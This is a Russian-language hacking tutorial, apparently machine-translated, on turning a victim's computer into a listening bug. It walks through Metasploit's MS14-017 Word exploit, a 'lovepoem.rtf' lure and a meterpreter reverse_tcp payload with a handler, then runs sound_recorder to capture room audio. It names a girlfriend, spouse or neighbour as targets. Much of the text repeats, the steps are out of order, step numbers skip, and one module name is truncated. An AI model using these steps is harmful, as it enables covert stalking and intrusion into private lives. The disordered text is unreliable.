Теперь, когда компьютер есть практически у каждого и везде, вы можете использовать эти удалённые компьютеры для старой доброй шпионажа «плаща и кинжала». Шпионаж больше не является прерогативой только ЦРУ, АНБ, КГБ и других спецслужб — вы тоже можете этому научиться.
В этой серии мы рассмотрим, как можно использовать повсеместность компьютера, чтобы подглядывать практически за кем угодно и где угодно. В отличие от шпионских фильмов прошлых лет, где шпиону приходилось помещать подслушивающее устройство в лампу или комнатное растение, если в комнате есть компьютер, его можно использовать как «жучок».
Мы узнаем, как превратить обычный компьютер в наш собственный «жучок», чтобы прослушивать разговоры, использовать его как шпионскую камеру, отслеживать поисковые запросы в интернете и многое другое. Джеймс Бонд и Q нам не помеха!
В этой первой части я покажу вам, как превратить любой компьютер, где бы он ни находился, в подслушивающее устройство. Поскольку сейчас компьютеры есть практически в каждой комнате, вы можете установить жучок практически в любой комнате, оставаясь незамеченным и незамеченным.
Поскольку мы знаем жертву (это может быть девушка, соседка, супруг(а), деловой партнёр, иностранный дипломат, иностранный шпион и т. д.), мы можем быть очень точными в составлении электронного письма, которое заинтересует её. Главное, конечно же, создать документ, который звучит убедительно или, по крайней мере, интересно, чтобы побудить жертву открыть документ Word.
На этом этапе это становится своего рода упражнением в социальной инженерии. Если жертва — ваша девушка/парень, можно попробовать отправить любовное письмо. Если жертва — деловой партнёр, это может быть документ Word или Excel с отчётом о продажах или другим отчётом. Если жертва — сосед, это может быть ссылка на веб-страницу сообщества.
Надеюсь, вы поняли. Проявите креативность и фантазию и отправьте что-то, что человек захочет открыть и посмотреть.
И последнее, прежде чем мы продолжим: не все эксплойты требуют социальной инженерии. В некоторых случаях можно эксплойтить систему без каких-либо действий со стороны жертвы. Например, эксплойт ETERNALBLUE, разработанный американским сверхсекретным разведывательным агентством NSA, не требует никакого вмешательства со стороны пользователя. Подробнее об использовании ETERNALBLUE можно узнать в моей статье здесь .
Весной этого года компания Microsoft сообщила, что хакеры обнаружили уязвимость в приложениях Microsoft Word и Office Web, которая могла позволить удалённое выполнение кода (читай: руткит). Ниже представлено объявление Microsoft в бюллетене безопасности Technet (подробнее о Technet можно узнать здесь).
Как видите, они назвали её MS14-017. Поиск этой уязвимости/эксплойта в Metasploit показывает:
эксплойт/windows/fileformat/ms14_017_rt
Теперь, когда мы нашли нужный эксплойт, давайте загрузим его в Metasploit, введя:
msf >используйте exploit/windows/fileformat/ms14_017_rtf
После загрузки давайте введем «info», чтобы узнать больше об этом эксплойте.
Теперь «показать параметры».
Как видите, нам нужно заполнить параметр FILENAME. Кроме того, обратите внимание, что этот эксплойт работает только в Office 2010.
msf > set FILENAME lovepoem.rtf
msf > set PAYLOAD windows/meterpreter/reverse_tcp
Затем задайте LHOST. Это IP-адрес вашей системы. Он указывает полезной нагрузке, к кому обращаться при её запуске жертвой.
Наконец, просто введите «exploit». Это создаст файл Word под названием «lovepoem», который разместит meterpreter в её системе, к которой мы затем сможем подключиться.
msf > использовать эксплойт/мульти/обработчик
msf > set PAYLOAD windows/meterpreter/reverse_tcp
В командной строке meterpreter просто введите:
meterpreter > запустить sound_recorder – l /root
Это включит микрофон на её компьютере и сохранит записанные разговоры и звуки в файле в корневом каталоге вашей системы. Конечно, вы можете выбрать любой каталог для хранения этих записей. Только убедитесь, что у вас достаточно места на жёстком диске, так как эти файлы могут быть очень большими. Когда вы захотите прослушать записанное, просто откройте сохранённый файл в своей системе.
В этой серии мы рассмотрим, как можно использовать повсеместность компьютера, чтобы подглядывать практически за кем угодно и где угодно. В отличие от шпионских фильмов прошлых лет, где шпиону приходилось помещать подслушивающее устройство в лампу или комнатное растение, если в комнате есть компьютер, его можно использовать как «жучок».
Мы узнаем, как превратить обычный компьютер в наш собственный «жучок», чтобы прослушивать разговоры, использовать его как шпионскую камеру, отслеживать поисковые запросы в интернете и многое другое. Джеймс Бонд и Q нам не помеха!
В этой первой части я покажу вам, как превратить любой компьютер, где бы он ни находился, в подслушивающее устройство. Поскольку сейчас компьютеры есть практически в каждой комнате, вы можете установить жучок практически в любой комнате, оставаясь незамеченным и незамеченным.
Шаг 1: Запустите Kali
Первый шаг, конечно же, — запустить Kali Linux и открыть Metasploit. Чтобы использовать любой компьютер в качестве жучка, первым шагом будет компрометация целевого компьютера.
Шаг 2: Взлом удаленного компьютера
Вероятно, лучший способ скомпрометировать компьютер жертвы — использовать тщательно составленное электронное письмо, которое заставит жертву кликнуть по документу или ссылке. В этот документ или ссылку мы внедрим руткит/прослушиватель, который позволит нам включить встроенный микрофон на компьютере жертвы и записать все разговоры в комнате, где он находится.Поскольку мы знаем жертву (это может быть девушка, соседка, супруг(а), деловой партнёр, иностранный дипломат, иностранный шпион и т. д.), мы можем быть очень точными в составлении электронного письма, которое заинтересует её. Главное, конечно же, создать документ, который звучит убедительно или, по крайней мере, интересно, чтобы побудить жертву открыть документ Word.
На этом этапе это становится своего рода упражнением в социальной инженерии. Если жертва — ваша девушка/парень, можно попробовать отправить любовное письмо. Если жертва — деловой партнёр, это может быть документ Word или Excel с отчётом о продажах или другим отчётом. Если жертва — сосед, это может быть ссылка на веб-страницу сообщества.
Надеюсь, вы поняли. Проявите креативность и фантазию и отправьте что-то, что человек захочет открыть и посмотреть.
И последнее, прежде чем мы продолжим: не все эксплойты требуют социальной инженерии. В некоторых случаях можно эксплойтить систему без каких-либо действий со стороны жертвы. Например, эксплойт ETERNALBLUE, разработанный американским сверхсекретным разведывательным агентством NSA, не требует никакого вмешательства со стороны пользователя. Подробнее об использовании ETERNALBLUE можно узнать в моей статье здесь .
Шаг 3: Найдите эксплойт
Теперь, если мы хотим эксплуатировать систему Windows 7 (большинство эксплойтов для Windows 7 будут работать и в Windows 8), нам нужно найти эксплойт для Windows 7, который использует уязвимости в приложении Microsoft Word.Весной этого года компания Microsoft сообщила, что хакеры обнаружили уязвимость в приложениях Microsoft Word и Office Web, которая могла позволить удалённое выполнение кода (читай: руткит). Ниже представлено объявление Microsoft в бюллетене безопасности Technet (подробнее о Technet можно узнать здесь).
Как видите, они назвали её MS14-017. Поиск этой уязвимости/эксплойта в Metasploit показывает:
эксплойт/windows/fileformat/ms14_017_rt
Теперь, когда мы нашли нужный эксплойт, давайте загрузим его в Metasploit, введя:
msf >используйте exploit/windows/fileformat/ms14_017_rtf
После загрузки давайте введем «info», чтобы узнать больше об этом эксплойте.
Теперь «показать параметры».
Как видите, нам нужно заполнить параметр FILENAME. Кроме того, обратите внимание, что этот эксплойт работает только в Office 2010.
Шаг 4: Задайте ИМЯ ФАЙЛА
В этом примере мы будем шпионить за вашей девушкой, поэтому отправим ей любовное стихотворение. Назовём его «lovepoem.rtf».msf > set FILENAME lovepoem.rtf
Шаг 5: Установка полезной нагрузки
Далее нам нужно настроить полезную нагрузку для её «поэмы о любви». В данном случае давайте отправим meterpreter, поскольку он даёт нам практически неограниченную власть и контроль над взломанной системой.msf > set PAYLOAD windows/meterpreter/reverse_tcp
Затем задайте LHOST. Это IP-адрес вашей системы. Он указывает полезной нагрузке, к кому обращаться при её запуске жертвой.
Наконец, просто введите «exploit». Это создаст файл Word под названием «lovepoem», который разместит meterpreter в её системе, к которой мы затем сможем подключиться.
Шаг 6: Откройте многопользовательский обработчик для соединения
На следующем этапе нам необходимо открыть многопользовательский обработчик для получения соединения обратно в нашу систему.msf > использовать эксплойт/мульти/обработчик
msf > set PAYLOAD windows/meterpreter/reverse_tcp
Шаг 9: Запись с помощью микрофона
Далее мы включим микрофон на её компьютере и начнём записывать все звуки в пределах слышимости. В Metasploit есть скрипт на Ruby, который включит микрофон на целевой машине и начнёт записывать все звуки и разговоры поблизости. Если мы перейдём к нашему окончательному списку скриптов для meterpreter , мы найдём его среди множества готовых скриптов на Ruby, созданных для meterpreter.В командной строке meterpreter просто введите:
meterpreter > запустить sound_recorder – l /root
Это включит микрофон на её компьютере и сохранит записанные разговоры и звуки в файле в корневом каталоге вашей системы. Конечно, вы можете выбрать любой каталог для хранения этих записей. Только убедитесь, что у вас достаточно места на жёстком диске, так как эти файлы могут быть очень большими. Когда вы захотите прослушать записанное, просто откройте сохранённый файл в своей системе.